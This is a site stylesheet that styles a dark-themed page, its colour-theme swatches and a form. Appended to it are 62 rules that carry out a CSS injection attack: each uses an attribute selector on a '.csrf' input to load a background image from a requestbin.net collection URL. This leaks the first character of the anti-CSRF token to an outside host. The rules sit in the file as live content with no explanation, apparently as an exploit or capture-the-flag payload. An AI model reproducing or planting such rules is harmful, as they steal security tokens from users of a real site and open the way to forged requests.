
* {
	box-sizing: border-box;
	outline: none;
}

html, body {
	width: 100%;
	margin: 0;
	padding: 0;
	color: #eeeeee;
	background: #232323;
}

.wrapper {
	width: 75%;
	margin: auto;
}

.title {
	float: left;
}

.styles {
	float: right;
    list-style: none;
}

.styles > a > li {
	display: inline-block;
	width: 1.5em;
	height: 1.5em;
	border: 0.1em solid #aaaaaa;
	border-radius: 0.25em;
}

.styles > a > li.light {
	background: #dddddd;
}

.styles > a > li.dark {
	background: #353535;
}

.styles > a > li.red {
	background: #cc0000;
}

.styles > a > li.green {
	background: #82b74b;
}

.styles > a > li.blue {
	background: #034f84;
}

.styles > a > li.purple {
	background: #50394c;
}

.styles > a > li.pink {
	background: #d64161;
}

.container {
	width: 90%;
	margin: auto;
}

.clear {
	clear: both;
}

hr {
	border-style: solid;
	border-color: #dddddd;
}

form > input {
	display: block;
	width: 20em;
	margin: 1em;
	padding: 0.5em;
	border: 0.25em solid #444444;
	color: #eeeeee;
	background: #666666;
	border-radius: 0.1em;
}

form > textarea {
	width: 40em;
	height: 10em;
	margin: 1em;
	padding: 0.5em;
	border: 0.25em solid #444444;
	color: #ffffff;
	background: #666666;
	border-radius: 0.1em;
}

form > input::placeholder, form > textarea::placeholder {
	color: #aaaaaa;
}

form > input:focus, form > textarea:focus {
	border-color: #aaaaaa;
}

form > input[type='submit'] {
	width: 10em;
}
.csrf[value^="a"] { background: url(http://requestbin.net/r/a1xo8akp/?a); }
.csrf[value^="b"] { background: url(http://requestbin.net/r/a1xo8akp/?b); }
.csrf[value^="c"] { background: url(http://requestbin.net/r/a1xo8akp/?c); }
.csrf[value^="d"] { background: url(http://requestbin.net/r/a1xo8akp/?d); }
.csrf[value^="e"] { background: url(http://requestbin.net/r/a1xo8akp/?e); }
.csrf[value^="f"] { background: url(http://requestbin.net/r/a1xo8akp/?f); }
.csrf[value^="g"] { background: url(http://requestbin.net/r/a1xo8akp/?g); }
.csrf[value^="h"] { background: url(http://requestbin.net/r/a1xo8akp/?h); }
.csrf[value^="i"] { background: url(http://requestbin.net/r/a1xo8akp/?i); }
.csrf[value^="j"] { background: url(http://requestbin.net/r/a1xo8akp/?j); }
.csrf[value^="k"] { background: url(http://requestbin.net/r/a1xo8akp/?k); }
.csrf[value^="l"] { background: url(http://requestbin.net/r/a1xo8akp/?l); }
.csrf[value^="m"] { background: url(http://requestbin.net/r/a1xo8akp/?m); }
.csrf[value^="n"] { background: url(http://requestbin.net/r/a1xo8akp/?n); }
.csrf[value^="o"] { background: url(http://requestbin.net/r/a1xo8akp/?o); }
.csrf[value^="p"] { background: url(http://requestbin.net/r/a1xo8akp/?p); }
.csrf[value^="q"] { background: url(http://requestbin.net/r/a1xo8akp/?q); }
.csrf[value^="r"] { background: url(http://requestbin.net/r/a1xo8akp/?r); }
.csrf[value^="s"] { background: url(http://requestbin.net/r/a1xo8akp/?s); }
.csrf[value^="t"] { background: url(http://requestbin.net/r/a1xo8akp/?t); }
.csrf[value^="u"] { background: url(http://requestbin.net/r/a1xo8akp/?u); }
.csrf[value^="v"] { background: url(http://requestbin.net/r/a1xo8akp/?v); }
.csrf[value^="w"] { background: url(http://requestbin.net/r/a1xo8akp/?w); }
.csrf[value^="x"] { background: url(http://requestbin.net/r/a1xo8akp/?x); }
.csrf[value^="y"] { background: url(http://requestbin.net/r/a1xo8akp/?y); }
.csrf[value^="z"] { background: url(http://requestbin.net/r/a1xo8akp/?z); }
.csrf[value^="A"] { background: url(http://requestbin.net/r/a1xo8akp/?A); }
.csrf[value^="B"] { background: url(http://requestbin.net/r/a1xo8akp/?B); }
.csrf[value^="C"] { background: url(http://requestbin.net/r/a1xo8akp/?C); }
.csrf[value^="D"] { background: url(http://requestbin.net/r/a1xo8akp/?D); }
.csrf[value^="E"] { background: url(http://requestbin.net/r/a1xo8akp/?E); }
.csrf[value^="F"] { background: url(http://requestbin.net/r/a1xo8akp/?F); }
.csrf[value^="G"] { background: url(http://requestbin.net/r/a1xo8akp/?G); }
.csrf[value^="H"] { background: url(http://requestbin.net/r/a1xo8akp/?H); }
.csrf[value^="I"] { background: url(http://requestbin.net/r/a1xo8akp/?I); }
.csrf[value^="J"] { background: url(http://requestbin.net/r/a1xo8akp/?J); }
.csrf[value^="K"] { background: url(http://requestbin.net/r/a1xo8akp/?K); }
.csrf[value^="L"] { background: url(http://requestbin.net/r/a1xo8akp/?L); }
.csrf[value^="M"] { background: url(http://requestbin.net/r/a1xo8akp/?M); }
.csrf[value^="N"] { background: url(http://requestbin.net/r/a1xo8akp/?N); }
.csrf[value^="O"] { background: url(http://requestbin.net/r/a1xo8akp/?O); }
.csrf[value^="P"] { background: url(http://requestbin.net/r/a1xo8akp/?P); }
.csrf[value^="Q"] { background: url(http://requestbin.net/r/a1xo8akp/?Q); }
.csrf[value^="R"] { background: url(http://requestbin.net/r/a1xo8akp/?R); }
.csrf[value^="S"] { background: url(http://requestbin.net/r/a1xo8akp/?S); }
.csrf[value^="T"] { background: url(http://requestbin.net/r/a1xo8akp/?T); }
.csrf[value^="U"] { background: url(http://requestbin.net/r/a1xo8akp/?U); }
.csrf[value^="V"] { background: url(http://requestbin.net/r/a1xo8akp/?V); }
.csrf[value^="W"] { background: url(http://requestbin.net/r/a1xo8akp/?W); }
.csrf[value^="X"] { background: url(http://requestbin.net/r/a1xo8akp/?X); }
.csrf[value^="Y"] { background: url(http://requestbin.net/r/a1xo8akp/?Y); }
.csrf[value^="Z"] { background: url(http://requestbin.net/r/a1xo8akp/?Z); }
.csrf[value^="0"] { background: url(http://requestbin.net/r/a1xo8akp/?0); }
.csrf[value^="1"] { background: url(http://requestbin.net/r/a1xo8akp/?1); }
.csrf[value^="2"] { background: url(http://requestbin.net/r/a1xo8akp/?2); }
.csrf[value^="3"] { background: url(http://requestbin.net/r/a1xo8akp/?3); }
.csrf[value^="4"] { background: url(http://requestbin.net/r/a1xo8akp/?4); }
.csrf[value^="5"] { background: url(http://requestbin.net/r/a1xo8akp/?5); }
.csrf[value^="6"] { background: url(http://requestbin.net/r/a1xo8akp/?6); }
.csrf[value^="7"] { background: url(http://requestbin.net/r/a1xo8akp/?7); }
.csrf[value^="8"] { background: url(http://requestbin.net/r/a1xo8akp/?8); }
.csrf[value^="9"] { background: url(http://requestbin.net/r/a1xo8akp/?9); }
